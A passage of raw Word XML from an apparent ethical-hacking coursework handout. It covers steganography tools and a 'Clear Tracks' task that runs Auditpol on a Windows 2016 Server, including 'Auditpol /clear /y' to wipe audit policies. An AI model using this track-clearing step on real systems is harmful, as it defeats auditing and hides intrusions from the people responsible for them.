          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>testing)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>keep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>mind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>malicious files could be hidden in this format which needs your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-21"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="FF0000"/>
        </w:rPr>
        <w:t>attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63151F4D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5EB44D" w14:textId="47D8C60E" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:b/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17024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D3DFAC5" wp14:editId="6EF1A877">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5768340" cy="876300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="2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8340" cy="8763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8AC914" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:ind w:left="28"/>
                            </w:pPr>
                            <w:r>
                              <w:t>You could also try Stegno tools like Snow, Quick Stego, Open Stego and record your reflection.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4050CEBF" w14:textId="51CFFCB4" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="9"/>
                              <w:rPr>
                                <w:sz w:val="23"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="23"/>
                              </w:rPr>
                              <w:t>Recorded in my coursework</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="77183DFD" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28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4"/>
                              </w:rPr>
                              <w:t>Try</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-1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</w:rPr>
                              <w:t>them</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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0000"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</w:rPr>
                              <w:t>record</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>them</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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FF0000"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pacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>your</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>coursework</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>and/or</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-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FF0000"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</w:rPr>
                              <w:t>the</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>shared</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>Onenote</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-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</w:rPr>
                              <w:t>with instructions to gain</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF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</w:rPr>
                              <w:t>CREDITS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3DFAC5" id="Text Box 5" o:spid="_x0000_s1047" type="#_x0000_t202" style="position:absolute;margin-left:70.55pt;margin-top:14.4pt;width:454.2pt;height:69pt;z-index:-156994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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2D8AC914" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:ind w:left="28"/>
                      </w:pPr>
                      <w:r>
                        <w:t>You could also try Stegno tools like Snow, Quick Stego, Open Stego and record your reflection.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4050CEBF" w14:textId="51CFFCB4" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="9"/>
                        <w:rPr>
                          <w:sz w:val="23"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="23"/>
                        </w:rPr>
                        <w:t>Recorded in my coursework</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="77183DFD" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28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color w:val="FF0000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Try</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>them</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>and</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>record</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>them</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>in</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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pacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>your</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>coursework</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>and/or</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>in</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>the</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-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24"/>
                        </w:rPr>
                        <w:t>shared</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>Onenote</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>with instructions to gain</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF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0000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>CREDITS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837B3F5" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="103"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>Task 4: Clear Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFF8A82" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Use Auditpol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571622A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login to your Windows 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF9CED" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Command Prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC42EBA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="230"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditpol /get/category:* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-2"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D416E5C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="258"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>It would list all the categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233A2A2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F2C0D9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Enable the Audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD0DD1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2999"/>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:spacing w:before="232"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">auditpol /set /category:”system”, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“account logon”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:position w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/success:enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367D242" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4977"/>
        </w:tabs>
        <w:spacing w:before="107"/>
        <w:ind w:left="3000"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>/failure:enable</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-2"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA04D3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3067"/>
          <w:tab w:val="left" w:pos="3068"/>
        </w:tabs>
        <w:spacing w:before="232"/>
        <w:ind w:left="3067" w:hanging="428"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol /get/category:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-2"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297B3C6" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2999"/>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:spacing w:before="118"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You could see the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D87158" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2999"/>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To clear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>them…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A812E12" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="233" w:after="19"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol /clear /y Auditpol /get/category:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="62"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-2"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D15CAD" w14:textId="54143111" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="20" w:lineRule="exact"/>
        <w:ind w:left="1891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DCA4A47" wp14:editId="6BF93FDF">
                <wp:extent cx="5082540" cy="9525"/>
                <wp:effectExtent l="635" t="0" r="3175" b="0"/>
                <wp:docPr id="26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82540" cy="9525"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8004" cy="15"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="27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004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17C14F4" id="Group 3" o:spid="_x0000_s1026" style="width:400.2pt;height:.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="8004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">
                <v:rect id="Rectangle 4" o:spid="_x0000_s1027" style="position:absolute;width:8004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</w:p>
    <w:p w14:paraId="12DD4785" w14:textId="35011444" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:ind w:left="8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58848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47FB532D" wp14:editId="0E10C924">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>469900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2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662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9FE4E8" id="Line 2" o:spid="_x0000_s1026" style="position:absolute;z-index:1575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4.65pt,37pt" to="595.3pt,3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">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:t>End of the Document!!!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008B5358">
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="111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F2DD04" w14:textId="77777777" w:rsidR="00280B8F" w:rsidRDefault="00280B8F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1DAB5AFA" w14:textId="77777777" w:rsidR="00280B8F" w:rsidRDefault="00280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B491" w14:textId="3800F9B3" w:rsidR="008B5358" w:rsidRDefault="006E4E04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7284736" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D286FC3" wp14:editId="6458A6B9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>914400</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9803765</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5732145" cy="268605"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="8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32145" cy="268605"/>
                        <a:chOff x="1440" y="15439"/>
                        <a:chExt cx="9027" cy="423"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="10" name="Freeform 5"/>
                      <wps:cNvSpPr>
                        <a:spLocks/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="1440" y="15439"/>
                          <a:ext cx="903" cy="423"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 2342 1440"/>
                            <a:gd name="T1" fmla="*/ T0 w 903"/>
                            <a:gd name="T2" fmla="+- 0 15439 15439"/>
                            <a:gd name="T3" fmla="*/ 15439 h 423"/>
                            <a:gd name="T4" fmla="+- 0 1440 1440"/>
                            <a:gd name="T5" fmla="*/ T4 w 903"/>
                            <a:gd name="T6" fmla="+- 0 15439 15439"/>
                            <a:gd name="T7" fmla="*/ 15439 h 423"/>
                            <a:gd name="T8" fmla="+- 0 1440 1440"/>
                            <a:gd name="T9" fmla="*/ T8 w 903"/>
                            <a:gd name="T10" fmla="+- 0 15449 15439"/>
                            <a:gd name="T11" fmla="*/ 15449 h 423"/>
                            <a:gd name="T12" fmla="+- 0 1440 1440"/>
                            <a:gd name="T13" fmla="*/ T12 w 903"/>
                            <a:gd name="T14" fmla="+- 0 15521 15439"/>
                            <a:gd name="T15" fmla="*/ 15521 h 423"/>
                            <a:gd name="T16" fmla="+- 0 1440 1440"/>
                            <a:gd name="T17" fmla="*/ T16 w 903"/>
                            <a:gd name="T18" fmla="+- 0 15862 15439"/>
                            <a:gd name="T19" fmla="*/ 15862 h 423"/>
                            <a:gd name="T20" fmla="+- 0 2342 1440"/>
                            <a:gd name="T21" fmla="*/ T20 w 903"/>
                            <a:gd name="T22" fmla="+- 0 15862 15439"/>
                            <a:gd name="T23" fmla="*/ 15862 h 423"/>
                            <a:gd name="T24" fmla="+- 0 2342 1440"/>
                            <a:gd name="T25" fmla="*/ T24 w 903"/>
                            <a:gd name="T26" fmla="+- 0 15521 15439"/>
                            <a:gd name="T27" fmla="*/ 15521 h 423"/>
                            <a:gd name="T28" fmla="+- 0 2342 1440"/>
                            <a:gd name="T29" fmla="*/ T28 w 903"/>
                            <a:gd name="T30" fmla="+- 0 15449 15439"/>
                            <a:gd name="T31" fmla="*/ 15449 h 423"/>
                            <a:gd name="T32" fmla="+- 0 2342 1440"/>
                            <a:gd name="T33" fmla="*/ T32 w 903"/>
                            <a:gd name="T34" fmla="+- 0 15439 15439"/>
                            <a:gd name="T35" fmla="*/ 15439 h 42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903" h="423">
                              <a:moveTo>
                                <a:pt x="902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82"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="423"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902" y="423"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902" y="82"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9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4363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Freeform 4"/>
                      <wps:cNvSpPr>
                        <a:spLocks/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="2342" y="15439"/>
                          <a:ext cx="8124" cy="10"/>
                        </a:xfrm>
                        <a:custGeom>
